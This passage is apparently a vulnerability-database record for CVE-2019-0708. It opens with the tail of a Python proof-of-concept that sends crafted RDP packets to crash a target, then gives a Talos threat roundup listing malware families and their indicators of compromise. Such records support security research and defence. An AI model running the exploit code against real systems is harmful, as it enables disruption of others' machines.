b\"\\x03\\x00\\x00\\x28\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xeb\\x70\\x1a\\x1a\\x00\\x17\\x00\\xf0\\x03\\xea\\x03\\x01\\x00\\x00\\x01\\x00\\x00\\x27\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x32\\x00\"\r\n\ttls.sendall(p)\r\n\r\ndef send_kill_packet(tls, arch):\r\n\tif arch == \"32\":\r\n\t\tp = b\"\\x03\\x00\\x00\\x2e\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xef\\x70\\x14\\x0c\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\telif arch == \"64\":\r\n\t\tp = b\"\\x03\\x00\\x00\\x2e\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xef\\x70\\x14\\x0c\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\telse:\r\n\t\tprint(\"Make the second arguement '32' or '64' without quotes\")\r\n\t\tsys.exit()\r\n\ttls.sendall(p)\r\n\r\ndef terminate_connection(tls):\r\n\tp = b\"\\x03\\x00\\x00\\x09\\x02\\xf0\\x80\\x21\\x80\"\r\n\ttls.sendall(p)\r\n\r\ndef main(args):\r\n\ttls = send_init_packets(args[1])\r\n\r\n\tsend_client_data(tls)\r\n\tprint(\"[+] ClientData Packet Sent\")\r\n\r\n\tsend_channel_packets(tls)\r\n\tprint(\"[+] ChannelJoin/ErectDomain/AttachUser Sent\")\r\n\r\n\tsend_client_info(tls)\r\n\tprint(\"[+] ClientInfo Packet Sent\")\r\n\r\n\ttls.recv(8192)\r\n\ttls.recv(8192)\r\n\r\n\tsend_confirm_active(tls, None)\r\n\tprint(\"[+] ConfirmActive Packet Sent\")\r\n\r\n\tsend_establish_session(tls)\r\n\tprint(\"[+] Session Established\")\r\n\r\n\tsend_kill_packet(tls, args[2])\r\n\tterminate_connection(tls)\r\n\tprint(\"[+] Vuln Should Trigger\")\r\n\r\nif __name__ == '__main__':\r\n\tif len(sys.argv) != 3:\r\n\t\tprint(\"Usage: python poc.py 127.0.0.1 64\")\r\n\t\tsys.exit()\r\n\r\n\telif sys.argv[2] == '32' or '64':\r\n\t\t# I've had to send the packets 5 times for hosts that havent\r\n\t\t# had a terminal session since their last reboot. I think\r\n\t\t# I know why but atm its just easier to send the exchange\r\n\t\t# 5 times and it'll crash eventually. Most of the time its\r\n\t\t# the first time though.\r\n\t\tfor _ in range(5):\r\n\t\t\tmain(sys.argv)\r\n\r\n\telse:\r\n\t\tprint(\"Usage: python poc.py 127.0.0.1 64\")\r\n\t\tsys.exit()\n\n# 0day.today [2019-05-31] #", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/32826"}], "talosblog": [{"lastseen": "2019-08-02T16:45:00", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between July 26 and Aug. 2. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.\n\n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5d444a0f0c20b.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nWin.Trojan.Fareit-7090291-0 | Trojan | The Fareit trojan is primarily an information stealer with functionality to download and install other malware. \nWin.Malware.Tofsee-7090196-1 | Malware | Tofsee is multipurpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator\u2019s control. \nWin.Ransomware.TeslaCrypt-7090181-1 | Ransomware | TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the ransomware, and eventually, the malware developers released the master key allowing all encrypted files to be recovered easily. \nWin.Virus.Parite-7090021-0 | Virus | Parite is a polymorphic file infector. It infects executable files on the local machine and network drives. \nWin.Malware.Remcos-7089920-1 | Malware | Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. It is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Dropper.Kovter-7086582-0 | Dropper | Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries that store its malicious code. Kovter is capable of reinfecting a system even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware. \nWin.Dropper.Miner-7086571-0 | Dropper | This malware installs and executes cryptocurrency mining software. You can read more about this kind of threat on our blog https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html. \nWin.Trojan.Zegost-7086512-0 | Trojan | Zegost, also known as \"Zusy,\" uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as \"explorer.exe\" and \"winver.exe.\" When the user accesses a banking website, it displays a form to trick the user into submitting personal information. \nWin.Dropper.Ursnif-7083691-0 | Dropper | Ursnif is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Trojan.Fareit-7090291-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\Software\\WinRAR ` | 6 \n`<HKCU>\\SOFTWARE\\WINRAR \nValue Name: HWID ` | 6 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000003E9 \nValue Name: F ` | 6 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000001F5 \nValue Name: F ` | 6 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000003EC \nValue Name: F ` | 6 \nMutexes | Occurrences \n---|--- \n`Global\\b7b392a1-b3e0-11e9-a007-00501e3ae7b5` | 9 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`77[.]111[.]240[.]77` | 3 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`dkaul[.]su` | 3 \n`kglso[.]ru` | 3 \n`FFUEX[.]SU` | 3 \n`mmbild[.]se` | 3 \n`digitalimagellc[.]us` | 3 \n`PLNDIGITAL[.]ORG` | 3 \n`brettsplus[.]com[.]au` | 3 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 9 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 9 \n`%System32%\\config\\SAM` | 6 \n`%TEMP%\\-959430038.bat` | 1 \n`%TEMP%\\94859.bat` | 1 \n`%TEMP%\\-958164199.bat` | 1 \n`%TEMP%\\-958105901.bat` | 1 \n`%TEMP%\\-958121813.bat` | 1 \n`%TEMP%\\-958085949.bat` | 1 \n`%TEMP%\\-958128100.bat` | 1 \n`%TEMP%\\86484.bat` | 1 \n`%TEMP%\\100125.bat` | 1 \n`%TEMP%\\92015.bat` | 1 \n`%TEMP%\\92140.bat` | 1 \n`%TEMP%\\93656.bat` | 1 \n \n#### File Hashes\n\n` 037dbde69db377adba75065b57b988175b883d5d22a0211f78cd8e3ea63a8c0b 04d401c93e8648d698044aa500afbe0d1ba2e6352b208bac1f31e65f3786a6f4 0a860e6eace6b4fb43c40e1d1ff5aa646771fbb890afc291da814f7a7b66a686 2c022ec86c02f2629ad5e6db757a2ee169a7071e5ad458afdaf42b7e8dd24d37 3680f7e4dcf0416edb86258c24c6d41aae1fa7a37b2eb26a829dd4979ec28810 37d97b05a5f046eaa1939c9eacca2f337a3239bb00cd4895772547c5bc738831 912c9de409dee4bbfb4c29e4ef968e6df4a34e106ca49761b7ad47994f445f15 93669f7e7726bc9d4aaa24dcd8f84b0ccc30dbcefc974d6f4ea361179203c8e2 9d723fbcbb53a3b7f55cb1d6bcd9bd35d7f5eed752c90147cf6b9d72c2217409 9f38462f183111e0bff6672ac65485ce1d4593a31153f07d8cc9ce6f4edc6821 a67a928a736c05e48b977a0a2a140bd1ff2729b8d260a2dafae9871822cc14a3 c55d9bc607cf45dcc2fc66f6aca60d495ea4ac32c52828112e67a24761164fc7 d3dc4b97c1dda85f27401227881ce1f5267d6ceadf7f884b9e0264648f0687b1 dd563db1527d80f0b402fc44116a1de141d52226b245fa23e754b1b1e30514d9 f2399366114ae7a2567992ac96d06ca86f052bc0f90a4ccc3638807d2624de84 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-gs4-ZkaslIY/XURDF3XnwpI/AAAAAAAAB4o/wfo2xqLsTcIAs-7WHpWtMG4ETWp1AKscQCEwYBhgL/s1600/37d97b05a5f046eaa1939c9eacca2f337a3239bb00cd4895772547c5bc738831_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-gA88qSUJ5Gw/XURDXERyOvI/AAAAAAAAB4w/nF8L0cTFKVcM_P4-8Hfjwax7QjPVcnO9ACLcBGAs/s1600/37d97b05a5f046eaa1939c9eacca2f337a3239bb00cd4895772547c5bc738831_tg.png>)\n\n \n\n\n* * *\n\n### Win.Malware.Tofsee-7090196-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\System\\CurrentControlSet\\Services\\NapAgent\\Shas ` | 36 \n`<HKLM>\\System\\CurrentControlSet\\Services\\NapAgent\\Qecs ` | 36 \n`<HKLM>\\System\\CurrentControlSet\\Services\\NapAgent\\LocalConfig ` | 36 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\NAPAGENT\\LOCALCONFIG\\Enroll\\HcsGroups ` | 36 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\NAPAGENT\\LOCALCONFIG\\UI ` | 36 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 36 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 36 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 36 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 36 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 36 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 36 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 36 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 36 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\sraabisk ` | 6 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SRAABISK \nValue Name: ImagePath ` | 6 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\poxxyfph ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\POXXYFPH \nValue Name: ImagePath ` | 5 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\Java VM ` | 3 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\VBA ` | 3 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\IME ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\xwffgnxp ` | 3 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\XWFFGNXP \nValue Name: ImagePath ` | 3 \n`<HKCU>\\Software\\Microsoft\\<random, matching '[A-Z][a-z]{3,11}'> ` | 3 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\Direct3D ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\TPG ` | 2 \nMutexes | Occurrences \n---|--- \n`Frz_State` | 3 \n`Sandboxie_SingleInstanceMutex_Control` | 3 \n`8C7EF2D18C62E966FAA2F103BC71DB04` | 3 \n`B76FD347C7201967BD7510FFC887D89D` | 3 \n`F81EAF302D1CAD1CD52C598895B98F49` | 3 \n`B55D882B6AD53F2630F641F93DBC6632` | 3 \n`DFD9CCD816EA09FA87380EE972D3FE0A` | 3 \n`947A2F20D44434751A1FD63E133D3883` | 3 \n`27F7FFA07BD0546DF3E613F21C61F3E9` | 3 \n`B159CDAF25784C79CB1C9F0CDF12E94C` | 3 \n`891B5C99F4D8068194399C87B72D54C6` | 3 \n`9EA2A5F4E10686779AD6C370F4D8A134` | 3 \n`A4F11C837EB2FB7FE5D4A9AAC3668D44` | 3 \n`FCC07BE63C5A293474A56972D25359B2` | 3 \n`\\BaseNamedObjects\\55316F50AA5F7C0AF74B646D5BA30B6C` | 1 \n`\\BaseNamedObjects\\F6634E1FD2EF7234AA9F24F39DA8C989` | 1 \n`\\BaseNamedObjects\\ED5F41B655CEDB95F08EE542BD539E90` | 1 \n`\\BaseNamedObjects\\FD509C28F9012AA4076303B64747B793` | 1 \n`\\BaseNamedObjects\\CD01D078DCB1643DC8E3667F120CAB40` | 1 \n`\\BaseNamedObjects\\6F9EA2070C7CC350EF1BF8B5AC5A9601` | 1 \n`\\BaseNamedObjects\\CA8A51536CF3D38C27A4072A756591C1` | 1 \n`\\BaseNamedObjects\\B3E288CBEA2F275076EA13D7EAA6AA2B` | 1 \n`\\BaseNamedObjects\\5904F95108046C70AE0DC46DD119468C` | 1 \n`\\BaseNamedObjects\\DAB8A830ADCB8D21D190CF3C585F3F91` | 1 \n`\\BaseNamedObjects\\DB628CF0707BDD5E042097FDB915669A` | 1 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`103[.]248[.]137[.]133` | 36 \n`111[.]121[.]193[.]242` | 36 \n`104[.]47[.]53[.]36` | 19 \n`104[.]47[.]54[.]36` | 17 \n`104[.]215[.]148[.]63` | 11 \n`40[.]112[.]72[.]205` | 9 \n`40[.]76[.]4[.]15` | 8 \n`40[.]113[.]200[.]201` | 5 \n`185[.]198[.]57[.]151` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 36 \n`gordinka[.]xyz` | 3 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 36 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-z]{8}'>` | 36 \n`%System32%\\<random, matching '[a-z]{8}\\[a-z]{6,8}'>.exe (copy)` | 35 \n`%HOMEPATH%\\NTUSER.DAT` | 3 \n`%HOMEPATH%\\ntuser.dat.LOG1` | 3 \n`%APPDATA%\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\webappsstore.tmp` | 1 \n`%TEMP%\\akylzxd.exe` | 1 \n`%TEMP%\\6656.bat` | 1 \n`%TEMP%\\2712.bat` | 1 \n`%TEMP%\\6820.bat` | 1 \n`%TEMP%\\6042.bat` | 1 \n`%TEMP%\\8737.bat` | 1 \n`%TEMP%\\7438.bat` | 1 \n`%TEMP%\\8443.bat` | 1 \n`%TEMP%\\0502.bat` | 1 \n`%TEMP%\\1752.bat` | 1 \n`%TEMP%\\6287.bat` | 1 \n`%TEMP%\\3440.bat` | 1 \n`%TEMP%\\8320.bat` | 1 \n`%TEMP%\\8476.bat` | 1 \n`%TEMP%\\2350.bat` | 1 \n`%TEMP%\\0526.bat` | 1 \n`%TEMP%\\3735.bat` | 1 \n`%TEMP%\\8143.bat` | 1 \n`%TEMP%\\8515.bat` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0272591f11ebfafde7cbb811ce4d4cc8d650956e8ea850c0751ac2f4de954138 0528c84d8c9003db021603719a7649c359221c6d7b2ad918726f8bf48f5cc5c9 06ffafb628585e4db0e5663baca4bd11378f6a381994fd55194f9f071c3c5a0c 0bcba9302e58883bb6dc4b68ebf28e0849845d4bbf469b08b465a0bee4d69bd3 12b98384530eb3f073a46c50a7ad0248389b11b2d6c508e33f71bbf034578aa0 18b39e415880a0c86ac92ccaeb4b69ca6aeb7d800661b03249b9e522903ed38c 1ad0c706365e29e30a208cb8058b3f8023ab9838e728b83de99412ca3015c6a2 2622d0798a83e1377c5a495b12e23e77bef09bcfb3b880aa521ca2b402ff5f4e 2691b34696328d028edab98a5dcaf3e5d492908c5ba0d16d8cdb8927dd614fcc 29393f713a89a7529e4e66793a042c349ea7967957b0c02b8c6b40f3f05b52d0 2c77eaf233dec2d3b165dccec7350c0b4653e0db550fb14c1d3571bbd1a4d403 2c9c2c4bdb923a21057cb24a54cd593f61af0b913215911db43a939b4550a9c5 3070f13f4d3db4bee1c37eeafb6de059d6e172a40bdef17e3a778a71176ddf6d 394cb2df083d3106b6e659fdd8ec27514a82c2c48d9b21aa189efcce6a321677 3a8a90823aee9b2fa6bd72548b7b69b5d1e0917fcf10065ade2c944eac9fd703 3e5723f2b6a2480d4b0a3aac03e457e8abf21ef72eab2bd5d7ced9908eec929c 3e9abc021820c1f954388b59dc5d6f9a48b6bf15a22168576fa007778f5fe6cb 4193bb216522035460434b367f699ac2211317bcf86f777709fe2d1ab01bf649 48118321467cab596dbb1f049f3fed4b6cee2621933124f1bb3d36db5ea7aaf6 4c10c671efd90d492b7ddc4a9a20e0d8ec306fb333710f20f698c533331c4c04 4ee8e166d1f8f358038947b9a0a1d2c4d552112e179fdfa536769a9e79b2bbfe 4fe975be2d2cce5c26a849ea1d6d9342dfa79d332bed221736463427a45b22c5 5090d89adf0523559aba758adb1bf3c1f1afe20e354242a96020c41816652cbf 52d32a74235bdfac594154dedaf572d4cd38148016dc3ab4e4ae4c325b813bb7 556386fd0ca3000d635251734cfdffdbb4e8331c9c4ea6f576196f4a5fc3d21e `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-z5EKnIrTjKo/XURDgQzROJI/AAAAAAAAB40/ktRI_ASY4NIgMmeAXpkrRiFiDASMquqoQCLcBGAs/s1600/f64709e66da43b034d3fcf8a771b379df280f11e2d341e0b0eeba867397da194_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-yr1-tPZ-9Bc/XURDlxX-5YI/AAAAAAAAB44/cZVrdRjs0XcBLBRoAbMwDFil8itA7WC8gCLcBGAs/s1600/4fe975be2d2cce5c26a849ea1d6d9342dfa79d332bed221736463427a45b22c5_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-yPLf_xET_X0/XURDq-WO_OI/AAAAAAAAB5A/z-WfuOAHizEhBNRXqsR7h3LQnweLCQgRgCLcBGAs/s1600/5090d89adf0523559aba758adb1bf3c1f1afe20e354242a96020c41816652cbf_umbrella.png>)\n\n \n\n\n* * *\n\n### Win.Ransomware.TeslaCrypt-7090181-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: TileWallpaper ` | 13 \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: WallpaperStyle ` | 13 \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: Wallpaper ` | 13 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: msconfig ` | 13 \nMutexes | Occurrences \n---|--- \n`dslhufdks3` | 13 \n`Global\\1e6e4b01-b3e8-11e9-a007-00501e3ae7b5` | 5 \n`\\BaseNamedObjects\\RAS_MO_02` | 2 \n`\\BaseNamedObjects\\Global\\ADAP_WMI_ENTRY` | 2 \n`\\BaseNamedObjects\\Global\\RAS_MO_01` | 2 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`216[.]239[.]34[.]21` | 5 \n`216[.]239[.]38[.]21` | 4 \n`216[.]239[.]32[.]21` | 3 \n`148[.]81[.]111[.]121` | 2 \n`88[.]198[.]69[.]43` | 2 \n`194[.]150[.]168[.]74` | 2 \n`216[.]239[.]36[.]21` | 1 \n`192[.]35[.]177[.]64` | 1 \n`52[.]2[.]137[.]199` | 1 \n`104[.]216[.]88[.]248` | 1 \n`162[.]255[.]119[.]227` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ipinfo[.]io` | 13 \n`epmhyca5ol6plmx3[.]wh47f2as19[.]com` | 13 \n`epmhyca5ol6plmx3[.]tor2web[.]fi` | 13 \n`epmhyca5ol6plmx3[.]tor2web[.]blutmagie[.]de` | 13 \n`7tno4hib47vlep5o[.]7hwr34n18[.]com` | 13 \n`ant[.]trenz[.]pl` | 2 \n`ymxunc[.]com` | 1 \n`iiiavb[.]com` | 1 \n`ergcgi[.]com` | 1 \n`giyxhd[.]com` | 1 \n`lxecov[.]com` | 1 \n`ymjjaz[.]com` | 1 \n`uunzlo[.]com` | 1 \n`exukeu[.]com` | 1 \n`ogcfic[.]com` | 1 \n`ihpuyg[.]com` | 1 \n`yqnonu[.]com` | 1 \n`hzadcu[.]com` | 1 \n`fogwee[.]com` | 1 \n`aiszao[.]com` | 1 \n`fasuoi[.]com` | 1 \n`bsieau[.]com` | 1 \n`azuyzw[.]com` | 1 \n`aldcea[.]com` | 1 \n`gknysc[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\key.dat` | 15 \n`%APPDATA%\\log.html` | 15 \n`%APPDATA%\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\Desktop\\CryptoLocker.lnk` | 15 \n`%HOMEPATH%\\Desktop\\HELP_RESTORE_FILES.bmp` | 15 \n`%HOMEPATH%\\Desktop\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\Favorites\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\Favorites\\Links\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\Favorites\\Microsoft Websites\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\Local Settings\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\NetHood\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\PrintHood\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\Recent\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\SendTo\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\Start Menu\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\Templates\\HELP_RESTORE_FILES.txt` | 15 \n`%TEMP%\\HELP_RESTORE_FILES.txt` | 15 \n`%APPDATA%\\Microsoft\\HELP_RESTORE_FILES.txt` | 15 \n`%APPDATA%\\Microsoft\\Internet Explorer\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\My Documents\\HELP_RESTORE_FILES.txt` | 15 \n`%APPDATA%\\<random, matching [A-Fa-z0-9]{5,8}.exe` | 15 \n`\\$Recycle.Bin\\HELP_RESTORE_FILES.txt` | 13 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\HELP_RESTORE_FILES.txt` | 13 \n`%HOMEPATH%\\AppData\\HELP_RESTORE_FILES.txt` | 13 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0440593af56240ec063b2b37c106fc13375c2f503fdb707f9a83dd512c110430 11aaa79c21033387be690f5cf986c3c665d935a73682a16f5468c0b0a29ad2b6 1ccde26dc844e8c9fac9f94c2b4b1280fb69bd4f6759b944773e37be54e0d893 48113627269680d6875edef5b537babe9f99b2beb24aa1bc59aba2c12a8db364 4dff2478037871b72eecbeed8e0c4ba84aa0eab8ae54282a172cfb2059ceb74a 561465d60606ce7533cc049cc5025c426d888acf44d3334bcb5ff124cc9beb9f 58712cf1cab21e5e62d71ac9291eddcbda43944dc85f3eb91cee93d603761d56 5b076ac98c514923e6eb20cb3bd64db901988976af434052d5537c258a03614e 5eb80c4b9818c022a4b1e7cc5dbfca4c573cf76dfaf8ce7f8f8fa31dfbf77c4c 733f08642330249b7362d5496e7d5ddc660e69b99fcbf0128f3f6e647714dd86 7cc97b2908e9d76a917b37ca6433d451a5a0d866e18b0f92146c25bb56847a35 9b462800f1bef019d7ec00098682d3ea7fc60e6721555f616399228e4e3ad122 b1fbb20c2a4df11fe9a316156977f4f842c3c1f150c10e873cbac59aec43426c b7b24dc901e44293beaaa7ec379b8e8feb917abde42fdcdb38de5eda3cb147fa bb276ee7a6272c91c77fd973e1cd2a42e04274ca122eb28f4445cc1e8e49a014 bc2622816c972a21201772fd8b7635ecff8c1fcb6249dd02266ab92f1fa2687f c4fa6dc2ae89d1530423bb9842af7ba8e800b05ff81315130f9de893beb89288 da624ceb034570a844d919d20f1ac7db99516558cb6e2571e1ddd2f46d73c7e5 e27f924db5152237a6783a43d6bd982ab3dbd0e22aee3e8dc70980b083cff767 eccfe2366884a5a947aad1c26277043e3af20e6d1cf8e27b48e0bb72b1e963bd fc8946571e73d04ade5a3308de8b191eb747667fb31aa10162174542674a9746 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-0W13rKGvaSM/XURD-ARjbzI/AAAAAAAAB5M/C_JpTRreNg07q7OT4vK3Ji_4Xjo08RAFQCLcBGAs/s1600/bb276ee7a6272c91c77fd973e1cd2a42e04274ca122eb28f4445cc1e8e49a014_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-NBjRP-eCVtc/XUREDbwSYjI/AAAAAAAAB5Q/3s2qjGor-eEZxUysFeyMYg2nZwEZl0K7QCLcBGAs/s1600/bb276ee7a6272c91c77fd973e1cd2a42e04274ca122eb28f4445cc1e8e49a014_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-1BAR8R8PCBQ/XUREKLL4NAI/AAAAAAAAB5U/ntsJfLx-dUs5f9cVwtn1BzyKTvi6wPHdgCLcBGAs/s1600/bb276ee7a6272c91c77fd973e1cd2a42e04274ca122eb28f4445cc1e8e49a014_umbrella.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-Q4usCsyVhqo/XUREOn3AtaI/AAAAAAAAB5c/B8b0WCNgW1c5kZZmtNwBbUGsd3k-tEk9wCLcBGAs/s1600/b7b24dc901e44293beaaa7ec379b8e8feb917abde42fdcdb38de5eda3cb147fa_malware.png>)\n\n** \n**\n\n* * *\n\n### Win.Virus.Parite-7090021-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\Software\\Wow6432Node\\Intel\\ICCInst ` | 25 \nMutexes | Occurrences \n---|--- \n`Residented` | 25 \n`Global\\IIF-{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}` | 25 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching 